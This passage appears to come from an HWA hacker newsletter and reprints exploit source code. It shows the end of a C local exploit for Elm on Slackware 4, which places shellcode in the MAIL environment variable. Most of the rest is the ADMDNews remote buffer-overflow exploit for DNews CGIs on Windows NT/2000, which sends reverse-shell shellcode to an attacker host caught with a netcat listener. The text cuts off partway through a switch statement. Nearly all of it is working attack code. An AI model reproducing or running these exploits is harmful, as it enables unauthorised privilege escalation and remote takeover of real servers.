char gid=12;
long addy;
char *thaCode;
char *mailGid;
if(argc > 1) {
gid = (char) atoi(argv[1]);
mailGid = (char *)strchr(shellcode, 0x0c);
*mailGid = gid;
}
if(argc > 2) offset = atoi(argv[2]);
if(!(thaCode = (char *) malloc(NUMNOPS+sizeof(shellcode)+5))) {
fprintf(stderr, "Contact your admin and tell him to buy more RAM\n");
exit(-1);
}
addy = get_sp() - offset;
printf("/-----------------------------------------------\\\n");
printf("| Slack 4/Elm exploit - Scrippie |\n");
printf("\\-----------------------------------------------/\n");
printf("Assuming sgid(elm) = %d\n", (int) gid);
printf("Using ret addr = %x\n", addy);
printf("You're now EUID=mail, take care :-p\n");
printf("Please run \"reset\" when this works\n");
sleep(4);
memset(thaCode, 0x90, NUMNOPS);
thaCode[NUMNOPS] = 0x00; // Set to NULL to make strcat() work
strcat(thaCode, shellcode);
memcpy(thaCode + strlen(thaCode), (void *) &addy, 4);
setenv("MAIL", thaCode, 1); // We're going to be nasty now :)
if((execl("/usr/bin/elm", "/usr/bin/elm", NULL)) == -1) {
perror("execl()");
exit(-1);
}
exit(0);
}
@HWA
273.0 [IND] ADMDNews.zip win(nt/2k) remote overflow by ADM.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.hack.co.za/os/win/2k/ADMDNews.zip
/**
*** ADM PRIVATE DO NOT DISTRIBUTE #@#!*&@#!
***
***
***
*** ADMDNews_v2 - WinNT/Win2K x86 exploit for NetWin (www.netwinsite.com)
*** DNews server (v5.0f - v5.3e3) gupcgi.exe/dnewsweb.exe CGIs.
***
*** This program exploits the buffer overflow condition in gupcgi.exe/dnewsweb.exe CGIs
*** while processing the "cmd" parameter. Credit for discovering this vulnerability goes to
*** plaguez <ndubee@df.ru> (j3w k1ck 4ss br0!!) :>
***
*** Tested and confirmed under WinNT 4.0 SP5/SP6 & Win2K Beta 3 RC2 (build 2128)
***
*** Usage: ADMDNews <victimHost> <victimPort> <victimPath> <evilHost> <evilPort> <DNewsVersion>
***
*** First setup netcat on <evilHost> to listen on <evilPort>
***
*** Ex: nc -l -p <evilPort> -v -v
***
*** Then run the exploit against <victimHost> web server on <victimPort> where
*** <victimPath> is the path of the vulnerable CGI. <DNewsVersion> is set
*** according to the version of the DNews server package you are exploting. Please
*** look in program usage information for the codes corresponding to each
*** version.
***
*** THIS CODE IS ONLY FOR EDUCATIONAL PURPOSES. USE ONLY IN AN ETHICAL MANNER.
***
***
***
*** 1st March 2000
***
*** Joey__ <youcan_reachme@hotmail.com>
**/
#include <windows.h>
#include <stdio.h>
/*
Win9x tables
static unsigned int TableESP[1] = {0x636934};
static unsigned int TableFillSize[1] = {2004-1259};
static unsigned int TableWritableAddr[1] = {0x412000};
*/
/*
WinNT 4.0 tables
*/
static unsigned int TableESP[7] = {0x00116abc,
0x0012f2ec,
0x0012f2f0,
0x0012f2f0,
0x0012f2e8,
0x0012f2e8,
0x0012f2ec
};
static unsigned int TableFillSize[7] = {2004,
2000,
2000,
2000,
2000,
2000,
2000
};
static unsigned int TableWritableAddr[7] = {0x00412000,
0x00444000,
0x0043e000,
0x0043e000,
0x00441000,
0x00441000,
0x00444000
};
void print_banner()
{
printf ("ADMDNews - ADM PRIVATE DO NOT DISTRIBUTE #@#!*&@#!\n");
printf ("(c) 2000, Joey__ <youcan_reachme@hotmail.com>\n");
printf ("gr33tz - theowl,__ice,antilove,plaguez,horizon,xaphan,neonsurge,instd,duke_,stran9er,freeLSD,DiGit,ktwo,klog,cheez,rfp,acpizer\n\n");
}
void print_versions()
{
printf("\nVersions\n");
printf("0 - gupcgi.exe v5.0f - v5.3e3\n");
printf("1 - dnewsweb.exe v5.3d5\n");
printf("2 - dnewsweb.exe v5.0f\n");
printf("3 - dnewsweb.exe v5.0j2\n");
printf("4 - dnewsweb.exe v5.2b2\n");
printf("5 - dnewsweb.exe v5.2b3\n");
printf("6 - dnewsweb.exe v5.3e3\n");
}
void encodeHex(char* &pszTarget, int iByte)
{
*pszTarget++ = '%';
sprintf(pszTarget, "%02X", iByte & 0xff);
pszTarget+=2;
}
bool resolve (SOCKADDR_IN &anAddr, char* host, char*port)
{
HOSTENT hse;
HOSTENT *he = &hse;
unsigned long addr;
anAddr.sin_family = AF_INET;
anAddr.sin_port = htons(atoi(port));
if (INADDR_NONE == (addr = inet_addr(host)))
{
if(NULL == (he = gethostbyname(host)))
return (false);
anAddr.sin_addr.S_un.S_addr = *((unsigned long *)(he->h_addr_list[0]));
}
else
anAddr.sin_addr.S_un.S_addr = addr;
return(true);
}
void main(int argc, char* argv[])
{
char* pszReq = "GET %s?cmd=%s%s%s HTTP/1.1\r\nHost: %s\r\n\r\n";
char szReqBuf[65536];
char szFillBuf[65536];
char szESPBuf[64];
char szShellCodeBuf[65536];
char* pszFill = NULL;
char* pszESP = NULL;
char* pszShellCode = NULL;
unsigned int iFillSize,iESP,iWritableAddr;
FILE* fSploit;
unsigned int iSploitSize;
char* pSploitBuf;
WSADATA wsaData;
SOCKADDR_IN victimAddr;
SOCKADDR_IN evilAddr;
SOCKET s;
unsigned int i, iVer;
print_banner();
if (argc < 7)
{
printf("Usage: %s <victimHost> <victimPort> <victimPath> <evilHost> <evilPort> <DNewsVersion>\n", argv[0] );
print_versions();
exit(1);
}
char *victimHost = argv[1];
char *victimPort = argv[2];
char *victimPath = argv[3];
char *evilHost = argv[4];
char *evilPort = argv[5];
char *dnewsVersion = argv[6];
if (NULL == (fSploit = fopen ( "reverse-shell-v1", "rb")))
{
printf ("wh0 fux0r3d d4 spl01t c0d3?\n");
exit(2);
}
fseek(fSploit, 0, SEEK_END);
iSploitSize = ftell (fSploit);
fseek(fSploit, 0, SEEK_SET);
pSploitBuf = (char *)malloc(iSploitSize);
fread(pSploitBuf,1,iSploitSize,fSploit);
fclose(fSploit);
iVer = atoi(dnewsVersion);
iWritableAddr = TableWritableAddr[iVer];
iFillSize = TableFillSize[iVer] - iSploitSize;
iESP = TableESP[iVer];
pszESP = szESPBuf;
encodeHex (pszESP,((byte*)(&iESP))[0]);
encodeHex (pszESP,((byte*)(&iESP))[1]);
encodeHex (pszESP,((byte*)(&iESP))[2]);
encodeHex (pszESP,((byte*)(&iESP))[3]);
*pszESP = 0x00;
pszESP = szESPBuf;
pszFill = szFillBuf;
for (i=0;i<iFillSize;i++)
*pszFill++ = 'A';
*pszFill =0x00;
pszFill = szFillBuf;
const WORD wMinVer = 0x0101;
if( 0 != WSAStartup( wMinVer, &wsaData ) )
{
printf ("n0 w1nz00k3!\n");
exit(3);
}
if (!(resolve(victimAddr,victimHost,victimPort)))
{
WSACleanup();
printf ("fux0r3d v1ct1m h0st/p0rt!\n");
exit(4);
}
if (!(resolve(evilAddr,evilHost,evilPort)))
{
WSACleanup();
printf ("fux0r3d 3v1l h0st/p0rt!\n");
exit(5);
}
*((DWORD *)(pSploitBuf+0x2f)) = iWritableAddr;
*((DWORD *)(pSploitBuf+0x38e)) = evilAddr.sin_addr.S_un.S_addr;
*((WORD *)(pSploitBuf+0x38c)) = evilAddr.sin_port;
pszShellCode = szShellCodeBuf;
for (i=0;i<iSploitSize;i++) {
if (iVer)
{
switch (pSploitBuf[i]) {
case 0:
case 1:
case 2:
case 3:
case 4:
case 5:
case 6:
case 7:
case 8:
case 9:
case 10:
case 11:
case 12:
case 13:
case 14:
case 15:
case 16:
case 17:
case 18:
case 19:
case 20:
case 21:
case 22:
case 23:
case 24:
case 25:
case 26:
case 27:
case 28:
case 29:
case 30:
case 31:
case '-':
case '%':
case '~':
case '+':
case '<':
case '>':
case '&':
case '^':
case '